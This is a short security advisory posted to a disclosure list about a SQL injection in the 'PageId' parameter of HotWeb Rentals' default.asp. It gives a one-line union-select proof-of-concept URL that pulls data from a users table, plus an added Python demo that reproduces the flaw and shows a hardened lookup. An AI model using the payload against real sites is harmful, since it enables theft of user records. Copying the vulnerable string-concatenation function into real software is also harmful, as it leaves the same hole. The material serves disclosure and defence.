HotWeb Rentals "PageId" SQL Injection Vulnerability

From: non customers <non-customers@operamail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: HotWeb Rentals "PageId" SQL Injection Vulnerability
Date:


HotWeb Rentals "PageId" SQL Injection Vulnerability

PRODUCT >>> http://www.hotwebscripts.co.uk/

Input passed to the "PageId" parameter in default.asp is not properly sanitised before being used in
SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC >>> default.asp?PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users

-- 
non-customers crew | http://rock-madrid.com/
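
Added example, not part of the original advisory or the vendor's code: a Python/sqlite3 reproduction of the flaw described above against a constructed in-memory database, next to a hardened lookup. The table layout (a nine-column `pages` table, a `users` table), the function names and the sample rows are assumptions; only the query string is taken from the advisory.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string exactly as given on the advisory's POC line.
POC_QUERY = "PageId=-15+union+select+11,22,33,44,55,66,77,88,99+from+users"

def make_db():
    """Constructed stand-in schema; the real application's tables are unknown."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title, c3, c4, c5, c6, c7, c8, c9)")
    db.execute("INSERT INTO pages VALUES (1, 'Home', 0, 0, 0, 0, 0, 0, 0)")
    db.execute("CREATE TABLE users (name, password)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-value')")
    return db

def page_id_from(query):
    """Decode PageId the way a web server would ('+' becomes a space)."""
    return parse_qs(query)["PageId"][0]

def load_page_vulnerable(db, page_id):
    # Flawed pattern: the parameter is concatenated into the SQL text, so
    # anything after the number is parsed as SQL.
    return db.execute("SELECT * FROM pages WHERE id = " + page_id).fetchall()

def load_page_hardened(db, page_id):
    # 1) Allow only a short run of ASCII digits (a page id is an integer).
    if not (page_id.isascii() and page_id.isdigit() and len(page_id) <= 9):
        raise ValueError("PageId must be a decimal integer")
    # 2) Bind the value as a parameter so it can never alter the statement.
    return db.execute("SELECT * FROM pages WHERE id = ?", (int(page_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    raw = page_id_from(POC_QUERY)
    print("vulnerable:", load_page_vulnerable(db, raw))
    try:
        load_page_hardened(db, raw)
    except ValueError as exc:
        print("hardened rejected:", exc)
    print("hardened, valid id:", load_page_hardened(db, "1"))
```

In classic ASP the same two steps map to a numeric check on the request value followed by a parameterised ADODB.Command instead of a concatenated SQL string.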



